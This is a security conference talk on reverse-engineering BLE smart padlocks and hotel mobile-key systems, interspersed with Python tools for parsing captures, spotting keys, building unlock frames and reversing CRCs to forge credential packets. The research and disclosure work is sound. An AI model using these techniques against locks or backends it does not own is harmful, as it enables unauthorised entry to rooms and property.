[V1.1 as of 2019-11-05 with some updates that were added after LockCon 2019.]

Disclaimer: The opinions expressed here are those of the author only; the author is not affiliated with the lock manufacturers in any way; the lock manufacturers or the author's employers have nothing to do with this presentation. All trademarks are the property of their owners. The information was derived only from the analysis of single locks and might be incomplete and / or might contain errors. The author gives no warranty and accepts no liability whatsoever concerning this presentation.

What This Presentation Is About


• 'Smart' devices using Bluetooth Low Energy
• How to analyze / hack / improve them
• Vulnerabilities we found that way, from cheap padlocks to hotel door systems
• An update on the X-09 high security lock

LockCon 2019 - Kasteel de Berckt, Baarlo, NL

1. Bluetooth Low Energy (BLE) Ecosystem
2. How to Analyze BLE Systems
3. Previous Vulnerabilities
4. BLE Hotel Keys
5. Responsible Disclosure
6. X-09 Side-channel Attack?
The BLE Ecosystem

BLE Locks

Components of a "Smart" Lock Ecosystem:

  Lock  <-- BLE -->  Smartphone App  <-- HTTP / HTTPS -->  Internet (backend)
BLE Locks - Attack Vectors

  Lock  <-- BLE -->  Smartphone App  <-- HTTP / HTTPS -->  Internet (backend)

Connections: machine-in-the-middle, impersonation

How to Analyze BLE
Getting the BLE Traffic

• On your own device, log traffic locally:
  ◦ Android: enable developer options, activate the Bluetooth HCI snoop log
  ◦ iOS: install Apple's Bluetooth debug (logging) profile on your device

• Now use the app and interact with the device
• Note timestamps of important actions (like "open lock")
• Get the HCI log from the phone
• Analyze using tools like Wireshark
  Frame 845: 18 bytes on wire (144 bits), 18 bytes captured (144 bits)
  Bluetooth
  Bluetooth HCI H4
  Bluetooth HCI ACL Packet
  Bluetooth L2CAP Protocol
      Length: 9
      CID: Attribute Protocol (0x0004)
  Bluetooth Attribute Protocol
      Opcode: Write Request (0x12)
      Handle: 0x0029 (Unknown: Unknown)
      Value: 55410027dbe8
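The "get the HCI log, find the writes" step can be scripted instead of clicked through in Wireshark. The following is an added example, not code from the slides: it walks the same HCI H4 -> ACL -> L2CAP -> ATT layering Wireshark dissected for frame 845, directly over the bytes of an Android btsnoop_hci.log. The 18-byte frame is reconstructed from the dissected fields on the slide (ATT Write Request, handle 0x0029, value 55410027dbe8); the ACL connection handle 0x0040 and the PB flag are assumptions, the slide does not show them, and the btsnoop file around it is constructed for the example.

```python
"""Extract ATT writes from a btsnoop HCI log (added example, not from the slides)."""
import struct
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

H4_ACL_DATA = 0x02
L2CAP_CID_ATT = 0x0004
ATT_WRITE_REQUEST, ATT_WRITE_COMMAND = 0x12, 0x52
# btsnoop timestamps are microseconds since 0000-01-01; this many seconds
# separate that epoch from 1970-01-01 (the same constant Wireshark uses).
BTSNOOP_EPOCH_OFFSET_S = 62168256000


@dataclass
class AttWrite:
    timestamp: float   # Unix time in seconds, to correlate with "open lock" notes
    opcode: int
    handle: int
    value: bytes


def iter_btsnoop(blob: bytes) -> Iterator[Tuple[float, bytes]]:
    """Yield (unix_timestamp, packet) from a btsnoop v1 file with datalink 1002 (H4)."""
    magic, version, datalink = struct.unpack_from(">8sII", blob, 0)
    if magic != b"btsnoop\x00" or version != 1:
        raise ValueError("not a btsnoop v1 file")
    if datalink != 1002:
        raise ValueError(f"unsupported datalink {datalink}, expected 1002 (HCI UART/H4)")
    off = 16
    while off + 24 <= len(blob):
        _orig_len, incl_len, _flags, _drops, ts_us = struct.unpack_from(">IIIIq", blob, off)
        off += 24
        yield ts_us / 1e6 - BTSNOOP_EPOCH_OFFSET_S, blob[off:off + incl_len]
        off += incl_len


def parse_att_write(packet: bytes) -> Optional[Tuple[int, int, bytes]]:
    """Return (opcode, handle, value) if `packet` is an H4 ACL frame carrying an ATT write."""
    if not packet or packet[0] != H4_ACL_DATA:
        return None
    # ACL header: 12-bit connection handle + PB/BC flags, then payload length.
    _handle_flags, acl_len = struct.unpack_from("<HH", packet, 1)
    acl = packet[5:5 + acl_len]
    if len(acl) != acl_len or acl_len < 4:
        return None  # truncated or a continuation fragment: skip it
    l2_len, cid = struct.unpack_from("<HH", acl, 0)
    att = acl[4:4 + l2_len]
    if cid != L2CAP_CID_ATT or len(att) < 3:
        return None
    if att[0] not in (ATT_WRITE_REQUEST, ATT_WRITE_COMMAND):
        return None
    (att_handle,) = struct.unpack_from("<H", att, 1)
    return att[0], att_handle, att[3:]


def extract_att_writes(blob: bytes) -> List[AttWrite]:
    """Every ATT write in a btsnoop file, in capture order."""
    return [AttWrite(ts, *p) for ts, pkt in iter_btsnoop(blob) if (p := parse_att_write(pkt))]


# Constructed frame 845: 18 bytes, L2CAP length 9, exactly as Wireshark reported.
FRAME_845 = bytes.fromhex(
    "02"            # H4 packet type: ACL data
    "4020"          # ACL handle 0x0040, PB flag = first packet (assumed)
    "0d00"          # ACL payload length 13
    "0900"          # L2CAP length 9
    "0400"          # L2CAP CID 0x0004 = ATT
    "12"            # ATT opcode: Write Request
    "2900"          # attribute handle 0x0029
    "55410027dbe8"  # value
)
# An HCI command (H4 type 0x01, LE Set Scan Enable) that the parser must skip.
OTHER_PACKET = bytes.fromhex("010c20020100")


def build_btsnoop(packets: List[Tuple[int, bytes]]) -> bytes:
    """Constructed btsnoop file for testing; ts_us is microseconds since year 0."""
    out = bytearray(struct.pack(">8sII", b"btsnoop\x00", 1, 1002))
    for ts_us, pkt in packets:
        out += struct.pack(">IIIIq", len(pkt), len(pkt), 0, 0, ts_us) + pkt
    return bytes(out)


SAMPLE_LOG = build_btsnoop([
    ((BTSNOOP_EPOCH_OFFSET_S + 1_575_000_000) * 1_000_000, OTHER_PACKET),
    ((BTSNOOP_EPOCH_OFFSET_S + 1_575_000_001) * 1_000_000, FRAME_845),
])

if __name__ == "__main__":
    for w in extract_att_writes(SAMPLE_LOG):
        print(f"{w.timestamp:.6f} opcode=0x{w.opcode:02x} handle=0x{w.handle:04x} value={w.value.hex()}")
```

Run it on a real `btsnoop_hci.log` by replacing `SAMPLE_LOG` with the file contents; the timestamps come out in Unix seconds, so they can be matched against the notes taken while pressing "open lock". For the value above, bytes 2..4 hold 0x0027db = 10203, the reading the ANBOUD slide later makes of this same write.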
Sniffing BLE

• For real attacks, sniff BLE over the air
• 3 advertising channels; the connection request is sent on whichever of them the phone heard the advertisement on, so you need to be listening on that channel to catch the connection setup
• USB BLE sniffers ~$25

Classic Sniffing Tools

• Adafruit Bluefruit LE Sniffer or Ubertooth One
• Support Wireshark live view
• Can monitor only 1 advertising channel at a time, follow sequence
• OK for proof of concept, for reliable attacks you need more
Our Favorite Tool: btlejack

• btlejack by Damien Cauquil
• Firmware for cheap BLE USB devices: BBC micro:bit, BLE400, Adafruit Sniffer
• Use 3 devices and follow all advertising channels in parallel
• Much more than just sniffing: hijacking, ...

Ray's Proof-of-Concept

New Tool: Mirage

• Mirage by Romain Cayre
• Brings its own (hackable) BLE stack → more transparent MITM
• MITM on one device only (good & bad)
• Powerful and flexible framework → more difficult to use
How to Analyze the Backend Link

TLS MITM

• Only few apps use plain HTTP
• Add a fake root CA to intercept TLS/HTTPS
• MITM tools create certificates on the fly
• To analyze the app, not to break other people's TLS

Using MITM CAs

• iOS: just declare it as trusted
• Android:
  ◦ works easily up to 6.x; needs a rooted device on >= 7, because apps no longer trust user-added CAs by default
  ◦ or modify the app to use the user cert store: add a network security config to the manifest (then rebuild, sign)
If the App Uses Certificate Pinning

[Screenshot of the Mandalay Bay Resort and Casino (Las Vegas) app: "Digital key is not supported at the moment, please visit the Front Desk to pick up your room key. (Code: Certificate pinning failure! Peer certificate chain: sha256/hc5POtL6A7NcihlioLdxkWJEQYHrJFF70zbZ/7utprg= ...)" - "Tap to view Room Number"]

• Try the other app (iOS vs. Android), or an older version of the Android app
• Modify the app, rebuild, sign
• Use Frida / objection (runtime mobile exploration, git.io/objection)
  ◦ Intercept calls in the app, or in the OS
  → unlimited possibilities :)
TLS MITM Tools

• Unix command line: mitmproxy
• macOS: Charles Proxy
• Many more available, like Burp Suite or Fiddler

Example: mitmproxy

  2016-12-26 04:33:20  https://nokeapp.com/...   text/html  940b  762ms
  Request  Response  Detail
  [response headers; the header names are cropped in the screenshot]
  text/html; charset=utf-8
  c6d3/795272d60331a34ca3e03922c2/1
  Mon, 26 Dec 2016 04:57:55 GMT
  Google Frontend
  940
  close
  JSON
  {
      "lockcount": 2,
      "locks": [
          {
              "autounlock": "0",
              "battery": "196",
              "fobcodesavailable": "2",
              "fobcodesrefreshstate": ...,
              "foblocklinks": [],
              "foblocklinkscount": "0",
              "lockid": "38850",
              "lockkey": "40637020F41C",
              ...
  ?:help q:back [*:21984]
Analyzing the Collected Data

Example: Nokelock

• Small, cheap BLE padlock
• Company offers a large variety of locks (also for doors, cabinets, bikes, e-scooters...)

Note: Research as of 2018, the app has been improved in the meantime.
[Charles Proxy screenshots of the Nokelock app's backend traffic]

Sequence:

  https://www.gstatic.com
  http://android.bugly.qq.com
  https://graph.facebook.com
  http://app.nokelock.com:8080
    newNokelock
      user
        updateCid
        loginByPassword
        getinfo
        updateCid
        checkVersion
      lock
        getLockList
        getLockList

Response to loginByPassword (excerpt):

  {
      "type": ...,
      "account": "mh@tosl.org",
      "code": ...
  }

Response to getLockList (excerpt):

  "result": [{
      "name": "mh small",
      "id": 9945,
      "lockKey": [...],            (16 bytes, sent as a decimal list; see below)
      "isAdmin": 0,
      "firmwareVersion": "5.0",
      "type": 0,
      "barcode": "XBA040000645",
      "deviceId": "",
      "lockPwd": "000000",
      "mac": "C8:DF:84:2B:9C:2E",
      "account": "mh@tosl.org",
      "gsmVersion": null
  }],
  "status": "2000"

16 bytes "lockKey"

  lockKey as hex:
    1B 20 54 49 3A 05 5E 37
    48 55 35 49 4B 01 4D 45

  → maybe AES-128?
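Spotting the 16-byte "lockKey" by eye works for one response; for a whole capture it helps to let a script flag anything that decodes to a key-sized blob. The following is an added example, not code from the slides or from the Nokelock project: it walks a JSON response and reports values whose decoded length is 6, 8, 16, 24 or 32 bytes (hex, base64, MAC notation or a JSON integer list), plus any field whose name hints at a secret. Those heuristics and the name list are this example's own choices. The sample response is constructed from the fields shown on the slide, with the lockKey bytes printed there; the `response()` hook at the end is the mitmproxy addon entry point and is only used when the file is loaded with `mitmproxy -s`.

```python
"""Flag key-material candidates in captured backend JSON (added example)."""
import base64
import json
import re
from typing import Any, Dict, Iterator, List, Optional, Tuple

KEYISH_NAME = re.compile(r"key|pwd|pass|secret|token|nonce", re.I)   # example's own list
HEX = re.compile(r"[0-9a-fA-F]+")
B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")
MAC = re.compile(r"([0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2}")
INTERESTING_LENGTHS = {6, 8, 16, 24, 32}   # MAC, 64-bit, AES-128/192/256 sized blobs


def as_bytes(value: Any) -> Optional[bytes]:
    """Decode a JSON leaf into raw bytes if it looks like an encoded blob, else None."""
    if isinstance(value, list) and value and all(isinstance(x, int) and 0 <= x <= 255 for x in value):
        return bytes(value)                      # e.g. "lockKey": [27, 32, 84, ...]
    if not isinstance(value, str):
        return None
    s = value.strip()
    if MAC.fullmatch(s):
        return bytes.fromhex(re.sub(r"[:-]", "", s))
    if len(s) >= 4 and len(s) % 2 == 0 and HEX.fullmatch(s):
        return bytes.fromhex(s)
    if len(s) >= 8 and len(s) % 4 == 0 and B64.fullmatch(s):
        try:
            return base64.b64decode(s, validate=True)
        except ValueError:
            return None
    return None


def walk(obj: Any, path: str = "$") -> Iterator[Tuple[str, Any]]:
    """Yield (json-path, leaf); integer lists are kept whole as one leaf."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from walk(v, f"{path}.{k}")
    elif isinstance(obj, list) and not all(isinstance(x, int) for x in obj):
        for i, v in enumerate(obj):
            yield from walk(v, f"{path}[{i}]")
    else:
        yield path, obj


def find_key_candidates(text: str) -> List[Dict[str, Any]]:
    """Leaves that decode to an interesting length, or whose name hints at a
    secret (kept even when short, e.g. a 6-digit lock PIN)."""
    found = []
    for path, leaf in walk(json.loads(text)):
        raw = as_bytes(leaf)
        name_hit = bool(KEYISH_NAME.search(path.rsplit(".", 1)[-1]))
        if (raw is not None and len(raw) in INTERESTING_LENGTHS) or name_hit:
            found.append({"path": path, "value": leaf, "name_hint": name_hit,
                          "hex": raw.hex() if raw is not None else None,
                          "length": len(raw) if raw is not None else None})
    return found


def response(flow) -> None:
    """mitmproxy addon hook (mitmproxy -s this_file.py): report candidates live."""
    if "json" in flow.response.headers.get("content-type", ""):
        for cand in find_key_candidates(flow.response.get_text()):
            print(flow.request.pretty_url, cand["path"], cand["length"], cand["hex"])


# Constructed sample, modelled on the getLockList response on the slide.
LOCK_KEY = bytes.fromhex("1b2054493a055e37485535494b014d45")
SAMPLE_RESPONSE = json.dumps({
    "result": [{
        "name": "mh small", "id": 9945,
        "lockKey": list(LOCK_KEY),          # the backend sent it as a decimal list
        "isAdmin": 0, "firmwareVersion": "5.0", "type": 0,
        "barcode": "XBA040000645", "deviceId": "",
        "lockPwd": "000000", "mac": "C8:DF:84:2B:9C:2E",
        "account": "mh@tosl.org", "gsmVersion": None,
    }],
    "status": "2000",
})

if __name__ == "__main__":
    for cand in find_key_candidates(SAMPLE_RESPONSE):
        print(cand["path"], cand["length"], cand["hex"], "name hint" if cand["name_hint"] else "")
```

The length filter is deliberately loose: a 6-byte hit is as likely a MAC address or a device name as a key, so the output is a list to look at, not a verdict. The hotel "mobile_key" later in this talk, a JSON integer list, would be picked up by the same list rule.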
Traffic Looked Random - Decrypt It

Decrypt the BLE traffic with AES-128 ECB, using the 16-byte lockKey from the backend
→ doesn't look random any more ✓

(decrypted frames, one 16-byte block each, marked app → lock or lock → app)

Analyzing the Protocol

Look for patterns (compare several sessions):

  06 01 01 .. .. .. .. .. .. .. .. .. .. .. .. ..   (app → lock)
  06 02 07 d4 9c ea ce 01 05 00 00 00 00 00 00 00   (lock → app)
  02 01 01 .. .. .. .. .. .. .. .. .. .. .. .. ..   (app → lock)
  02 02 01 59 9c ea ce 01 05 00 00 00 00 00 00 00   (lock → app)

  05 01 06 .. .. .. .. .. .. .. .. .. .. .. .. ..   (app → lock)
  05 02 01 00 9c ea ce 01 05 00 00 00 00 00 00 00   (lock → app)
  05 0d 01 00 9c ea ce 01 05 00 00 00 00 00 00 00   (lock → app)

  05 01 06 30 30 30 30 30 30 d4 9c ea ce .. .. ..   (app → lock)
  05 02 01 00 9c ea ce 01 05 00 00 00 00 00 00 00   (lock → app)
  05 0d 01 00 9c ea ce 01 05 00 00 00 00 00 00 00   (lock → app)

  (".." marks bytes of the app → lock frames that did not survive extraction of the slide)

Deduce the protocol (from a few sessions):

  AUTH REQUEST     (060101)  ...                                           (app → lock)
  AUTH RESPONSE    (060207)  4 byte session ID, 0 padding                  (lock → app)
  STATUS REQUEST   (020101)  ...                                           (app → lock)
  STATUS RESPONSE  (020201)  battery state, 3 byte session ID, 0 padding   (lock → app)
  UNLOCK REQUEST   (050106)  passcode, session ID, ...                     (app → lock)
  UNLOCK ACK       (050201)  3 byte session ID, 0 padding                  (lock → app)
  UNLOCK CONFIRM   (050d01)  3 byte session ID, 0 padding                  (lock → app)

→ Session replay protection: 4 byte session ID created by the lock.
Next Steps

Verify the findings, look for weaknesses.

BLE protocol

• Write software that mimics the app, e.g. in Python with bluepy or Adafruit_BluefruitLE
• Explore the protocol, use fuzzing techniques

Whole system

• Maybe an OEM uses the same key for all devices?
• Maybe the backend leaks other users' keys? (when researching this, consider legal restrictions!)
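The "compare several sessions" step and the "write software that mimics the app" step above can share one small toolkit. The following is an added example, not the authors' code: it takes decrypted 16-byte Nokelock frames from two sessions, reports per command which byte offsets vary between sessions (nonce / session-ID / state candidates) and which stay constant, builds the app's UNLOCK REQUEST, and checks the replay protection the slides deduced (every later lock → app frame must carry the low three bytes of the session ID from that session's AUTH RESPONSE). Session A reproduces the lock → app bytes visible on the slides; session B is constructed with a different session ID and battery byte so that the comparison has something to find. The layout of the UNLOCK REQUEST (six ASCII passcode digits, then the 4-byte session ID, zero padded) is this example's assumption, as the slides only list the fields in that order; the `01 05` bytes that follow the session ID on the slides are carried along unexplained.

```python
"""Session comparison and app-mimicking frame builder for decrypted Nokelock
frames (added example; frame layouts partly assumed, see lead-in)."""
from collections import defaultdict
from typing import Dict, List

# Three-byte command prefixes named on the slides.
COMMANDS = {
    "AUTH_REQUEST": bytes.fromhex("060101"), "AUTH_RESPONSE": bytes.fromhex("060207"),
    "STATUS_REQUEST": bytes.fromhex("020101"), "STATUS_RESPONSE": bytes.fromhex("020201"),
    "UNLOCK_REQUEST": bytes.fromhex("050106"), "UNLOCK_ACK": bytes.fromhex("050201"),
    "UNLOCK_CONFIRM": bytes.fromhex("050d01"),
}
PREFIX_TO_NAME = {v: k for k, v in COMMANDS.items()}
LOCK_TO_APP_WITH_SESSION = ("STATUS_RESPONSE", "UNLOCK_ACK", "UNLOCK_CONFIRM")


def pad16(body: bytes) -> bytes:
    """Zero-pad to one AES block, as the decrypted frames on the slides are."""
    if len(body) > 16:
        raise ValueError("frame longer than one block")
    return body + bytes(16 - len(body))


def classify(frame: bytes) -> str:
    return PREFIX_TO_NAME.get(frame[:3], "UNKNOWN")


def varying_offsets(frames: List[bytes]) -> List[int]:
    """Byte offsets at which the given frames are not all identical."""
    return [i for i in range(16) if len({f[i] for f in frames}) > 1]


def field_map(sessions: List[List[bytes]]) -> Dict[str, Dict[str, List[int]]]:
    """Per command: offsets that vary between sessions and offsets that stay constant."""
    by_cmd: Dict[str, List[bytes]] = defaultdict(list)
    for frames in sessions:
        for f in frames:
            by_cmd[classify(f)].append(f)
    result = {}
    for cmd, frames in by_cmd.items():
        varying = varying_offsets(frames)
        result[cmd] = {"varying": varying, "constant": [i for i in range(16) if i not in varying]}
    return result


def session_id(auth_response: bytes) -> bytes:
    """The 4-byte session ID the lock creates, right after the 060207 prefix."""
    return auth_response[3:7]


def build_unlock_request(passcode: str, sid: bytes) -> bytes:
    """Mimic the app's UNLOCK REQUEST (layout assumed: 050106 | 6 ASCII digits | 4-byte ID)."""
    if len(passcode) != 6 or not passcode.isdigit() or len(sid) != 4:
        raise ValueError("passcode must be 6 digits, session ID 4 bytes")
    return pad16(COMMANDS["UNLOCK_REQUEST"] + passcode.encode("ascii") + sid)


def session_bound(frames: List[bytes]) -> bool:
    """Replay-protection check: every later lock->app frame must echo bytes 1..3
    of the session ID from this session's AUTH RESPONSE."""
    sid = None
    for f in frames:
        cmd = classify(f)
        if cmd == "AUTH_RESPONSE":
            sid = session_id(f)
        elif cmd in LOCK_TO_APP_WITH_SESSION:
            if sid is None or f[4:7] != sid[1:]:
                return False
    return sid is not None


def make_session(sid: bytes, battery: int, passcode: str = "000000") -> List[bytes]:
    """Decrypted frames of one unlock, in exchange order."""
    return [
        pad16(COMMANDS["AUTH_RESPONSE"] + sid + b"\x01\x05"),
        pad16(COMMANDS["STATUS_RESPONSE"] + bytes([battery]) + sid[1:] + b"\x01\x05"),
        build_unlock_request(passcode, sid),
        pad16(COMMANDS["UNLOCK_ACK"] + b"\x00" + sid[1:] + b"\x01\x05"),
        pad16(COMMANDS["UNLOCK_CONFIRM"] + b"\x00" + sid[1:] + b"\x01\x05"),
    ]


# Session A: the lock->app bytes on the slides (session ID d49ceace, battery 0x59).
# Session B: constructed.
SESSION_A = make_session(bytes.fromhex("d49ceace"), 0x59)
SESSION_B = make_session(bytes.fromhex("1a2b3c4d"), 0x4f)

if __name__ == "__main__":
    for cmd, info in field_map([SESSION_A, SESSION_B]).items():
        print(f"{cmd:16s} varying offsets: {info['varying']}")
```

Offsets that vary between sessions but stay constant within one are the session ID; an offset that varies inside a session (the battery byte here) is state. With a third, replayed session the `session_bound` check is what a lock implementation must enforce, and what a fuzzing harness built on this builder would deliberately violate.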
Examples of Previous VULNs

ANBOUD Padlock

• Typical cheap BLE padlock
• Shim-proof mechanics, but the passcode is transmitted in plain text
• To our knowledge still unfixed
ANBOUD PWNED

  Bluetooth Attribute Protocol
      Opcode: Write Request (0x12)
      Handle: 0x0029 (Unknown: Unknown)
      Value: 55410027dbe8

• Hex 0x0027db = Dec 10203, i.e. the lock code 010203 sent as one 24-bit integer
• That's the code I set on the lock
• The original app can now be used to open the lock with the sniffed code
12 of 16 locks vulnerable

• Rose & Ramsey at DEF CON 24 (2016)
• 12 of 16 tested locks had simple BLE vulnerabilities
• Only two of the padlocks remained unbroken
• One of those we opened with a magnet, like its predecessor, ...

[In the presentation we had a video showing how to turn the internal motor with a strong magnet. This PDF does not include the video, but you can get an idea from the video that's linked on the previous slide.]

12 of 16 locks vulnerable (cont.)

• One of those we opened with a magnet, like its predecessor, the other one ...
NOKE Padlock (!= Nokelock)

• One of the first BLE padlocks, $652,828 raised on Kickstarter in 2014
• Note: Research applies to the original firmware from 2015-2017 (our responsible disclosure in 2016 led to a firmware update in 2017)

NO(KE) Security

• Uses AES-128 cipher
• Uses two different secrets for owner and other users
• Time restrictions only enforced in the app

NOKE AES VULN

• Secret is transmitted using individual AES session keys
• But session keys are created in a "secret handshake" using a hardcoded AES key
• Security by obscurity

NOKE Session Key

  public createSessionKey
  createSessionKey proc near
      ...
      edx, byte ptr [esi+eax]
      dl, [edi+eax]
      [ecx+eax], dl
      eax, [eax+1]
      eax, 4
      short loc_3F78

  ...from the binary .so file in the APK (operands as extracted; the mnemonic column did not survive extraction)

NOKE KEX Broken

  app nonce:  b14c08a1
  OK
  lock nonce: bff91ae4

The new session key can now be used to decrypt the transfer of the user's secret.
BLE Hotel Keys

Why BLE for Hotels?

• Main purpose: self-check-in
• No keycard anymore, the mobile phone app is the key
• Hotels can reduce front desk staff
• Guests don't have to wait in a queue

Challenges for Vendors

• Secure pairing not feasible
• Old hardware in locks, not always online
• Apps often made by 3rd parties, the lock vendor just provides the SDK

Mobile Key

• Booking linked to app account, or added by user (sometimes using weak credentials)
• Online check-in
• Mobile key is transferred from backend to app
[Video that shows how to use the mobile app at a hotel door. (The graphics in the mobile app were modified using SSL MITM.)]

Video 1: Mobile Key Demo

Hotel "H"
Encrypted Mobile Key System

• The vendor has a secret key K_V, known to the lock
• Backend to App: key K and encrypted key K* = enc_K_V(K)
• App to Lock: K*
• Lock uses K_V to decrypt K* to K
• Key K now known to App and lock, but not to an eavesdropper; K_V still unknown to App
• Further BLE traffic is AES-encrypted with key K

• Didn't find an obvious attack vector, except for extracting K_V from the physical lock [1], which we haven't tried :)
• No further experiments, because on the second stay the mobile key system was deactivated.

[1] cf. Thomas, Black Hat USA 2014: Reverse-Engineering the Supra iBox

Manufacturer "M"
Vulnerable System

• Found system early 2019 in an upper class hotel
• Mobile key used in elevator, rooms and fitness center
• Analyzed TLS and BLE traffic

Key from Backend

  2019-07-25 03:23:08  GET https://app[...]/api/v1/devices/mobile_key/8fdcc75e-a290-4633-9fb8-865c9472ba63
                       <- 200 OK  application/json  702b  140ms
  Request  Response  Detail
  X-Request-Id: 48dd45a5-7610-4ba3-a684-f5853f5696dd
  X-Runtime: 0.047805
  Strict-Transport-Security: max-age=31536000; includeSubDomains
  JSON [m:Auto]
  {
      "device_token": "...",
      "exp_date": "2019-07-25 00:00:00.000",
      "key_type": ...,
      "mobile_key": {
          "dt": "2019-07-25T14:00+00:00",
          "...": [
              140,
              2,
              253,
              1,
              254,
              248,
              ...
  ?:help q:back [*:21984]

(140, 2, 253, 1, 254, 248 = 8c 02 fd 01 fe f8: the first key bytes that reappear in the BLE trace below)

Data seen in HCI log (BLE)

  Bluetooth HCI ACL Packet
  Bluetooth L2CAP Protocol
  Bluetooth Attribute Protocol
      Opcode: Write Request (0x12)
      Handle: 0x000e (Unknown: Unknown)
      Value: ...
Full BLE Trace, with Further Analysis

  Lock: 0000
  Lock: 000103001ec05d6bb5190707051b2b19e0   = Lock MAC, CRC
  App:  00010200001200010101010101bbec98f3   = App nonce, CRC
  Lock: 0001040104d612ffeafad012             = Lock nonce, CRC
  App:  3000000000000044ca8c02fd01fef8fdf9   = Special CRC, key
  App:  31605803e9196317fb5b9e8cb6e616b7bab6     (all key bytes from the backend)
  App:  32ca06cfbc48c67697f0c34897948c218c
  App:  33cf3f2a462f78d9c8874b6bb021b70034
  Lock: 0002190707051b00090ca500000001af08   = Lock confirmation: open
  Lock: 0002

Note: The description was slightly modified to protect the innocent not yet patched devices.
CRC Reversing

• Tools for CRC reversing are available, e.g. CRC RevEng
• We just used a custom Python script and searched for CRC-16 parameters that matched in at least 2 messages, assuming the CRC is located at the end of a message

  Trying different polynomials and start values...
  Trying polynomial 0x....
  ...
  Trying polynomial 0x....
  Match found: Polynomial: ....  Seed: 0x73  Final XOR: 0xffff

• The seed for the CRC of the first msg turned out to be a value received from the backend ("sc", constant within a hotel)
• The seed for the CRC of the next msg is the CRC of the previous msg
• But for the most important part, the credential packet, the CRC calculation was more complicated:

  00 00 00 00 00 00 | 0c 3b                       | 8c 02 fd 01 fe          | 7e f2 3b
  always zero       | 2 bytes changing each session | 5 bytes constant per hotel | 3 bytes constant per stay

• So we had 1 block with the CRC obviously not at the end, some constant blocks, 6 zero bytes, and 16 changing bits
• And 3 CRC-16 values and 2 session nonces to play with...
• [... some playing around ...]

Note: The description was slightly modified to protect the innocent not yet patched devices.
CRC Reversing

This intermediate byte sequence (and seed CRC3)

  84 3c  | 45 f2 | 88 40  | 34 f1 | 8c 02 fd 01 fe 7e f2 3b
  nonce1 | CRC1  | nonce2 | CRC2  |

yields the final CRC-16 value 0c3b.

→ Now we know how to create the credential packet:

  00 00 00 00 00 00       | 0c 3b             | 8c 02 fd 01 fe 7e f2 3b
  overwritten with zeroes | CRC inserted here |

Note: The description was slightly modified to protect the innocent not yet patched devices.
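The parameter search described on the CRC Reversing slides can be done without brute-forcing seeds at all. The following is an added example, not the authors' script: it recovers CRC-16 parameters from captured frames (CRC at the end of each frame, the same seed in at least two frames) and then checks the chained convention the slides found, where the seed of message n+1 is the CRC of message n. Instead of trying all 65536 seeds, the seed is obtained by running the CRC shift register backwards from the observed value, so only the polynomial and the final XOR are searched. All frames are constructed for the example: CRC-16/CCITT polynomial 0x1021, final XOR 0xffff, seed 0x0073 (the "SC 115" value from the script output later in the talk), big-endian CRC; the real hotel frames and their CRC parameters are not reproduced here. Only the non-reflected (MSB-first) CRC family is handled, and the transmitted CRC value is taken as the next seed, which is an assumption.

```python
"""Recover CRC-16 parameters from captured frames by reversing the shift register
(added example, constructed data)."""
from typing import List, Tuple

# Polynomials tried, in the spirit of "trying different polynomials"; CRC RevEng
# knows many more.  All have bit 0 set, which the reversal below relies on.
CANDIDATE_POLYS = [0x1021, 0x8005, 0x3d65, 0x0589, 0x8bb7, 0xa097, 0xc867, 0x1dcf, 0x755b, 0x5935]
CANDIDATE_XOROUTS = [0x0000, 0xffff]


def crc16(data: bytes, poly: int, seed: int, xorout: int = 0) -> int:
    """Plain MSB-first CRC-16 with the given parameters."""
    reg = seed & 0xffff
    for byte in data:
        reg ^= byte << 8
        for _ in range(8):
            reg = ((reg << 1) ^ poly) & 0xffff if reg & 0x8000 else (reg << 1) & 0xffff
    return reg ^ xorout


def recover_seed(data: bytes, crc: int, poly: int, xorout: int = 0) -> int:
    """Run crc16() backwards: from the observed CRC and the data, return the seed."""
    reg = crc ^ xorout
    for byte in reversed(data):
        for _ in range(8):
            # A left shift clears bit 0, so bit 0 is set afterwards only if poly
            # was XORed in, i.e. only if the top bit was set before the shift.
            if reg & 1:
                reg = ((reg ^ poly) >> 1) | 0x8000
            else:
                reg >>= 1
        reg ^= byte << 8
    return reg


def split_frame(frame: bytes) -> Tuple[bytes, int]:
    """Payload and big-endian CRC, assuming the CRC is the last two bytes."""
    return frame[:-2], int.from_bytes(frame[-2:], "big")


def find_params(frames: List[bytes]) -> List[Tuple[int, int, int]]:
    """(poly, seed, xorout) triples under which every frame checks out: the seed
    is derived from the first frame and verified against the others."""
    first, rest = split_frame(frames[0]), [split_frame(f) for f in frames[1:]]
    hits = []
    for poly in CANDIDATE_POLYS:
        for xorout in CANDIDATE_XOROUTS:
            seed = recover_seed(first[0], first[1], poly, xorout)
            if all(crc16(p, poly, seed, xorout) == c for p, c in rest):
                hits.append((poly, seed, xorout))
    return hits


def check_chained(frames: List[bytes], poly: int, first_seed: int, xorout: int) -> bool:
    """Verify a session in which each transmitted CRC seeds the next message's CRC."""
    seed = first_seed
    for frame in frames:
        payload, crc = split_frame(frame)
        if crc16(payload, poly, seed, xorout) != crc:
            return False
        seed = crc
    return True


# ---- constructed test data (not the real hotel frames) ----------------------
POLY, XOROUT, SC = 0x1021, 0xffff, 0x0073


def make_session(payloads: List[bytes], first_seed: int) -> List[bytes]:
    frames, seed = [], first_seed
    for p in payloads:
        crc = crc16(p, POLY, seed, XOROUT)
        frames.append(p + crc.to_bytes(2, "big"))
        seed = crc
    return frames


# Payload shapes loosely follow the trace (lock MAC, app nonce, lock nonce frames).
SESSION_1 = make_session([bytes.fromhex("000103001ec05d6bb5190707051b2b"),
                          bytes.fromhex("000102000012000101010101010101"),
                          bytes.fromhex("0001040104d612ffea")], SC)
SESSION_2 = make_session([bytes.fromhex("000103001ec05d6bb51907070a1c30"),
                          bytes.fromhex("000102000012000102020202020202"),
                          bytes.fromhex("00010401043b8f0c17")], SC)

if __name__ == "__main__":
    hits = find_params([SESSION_1[0], SESSION_2[0]])
    print("parameter hits:", [(hex(p), hex(s), hex(x)) for p, s, x in hits])
    print("session 1 chained OK:", check_chained(SESSION_1, POLY, SC, XOROUT))
```

Two first-of-session frames are enough to pin the seed because the reversal is exact: a wrong polynomial or final XOR yields some seed for the first frame that then fails on the second with probability about 1 - 2^-16 per candidate. Reflected CRC variants would need the mirrored shift in both `crc16` and `recover_seed`.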
Preparing an Attack

• Created a Python script
  ◦ Input: device name, credential bytes (as sniffed from a previous opening)
  ◦ Calculates CRCs, handles BLE communication (using bluepy)

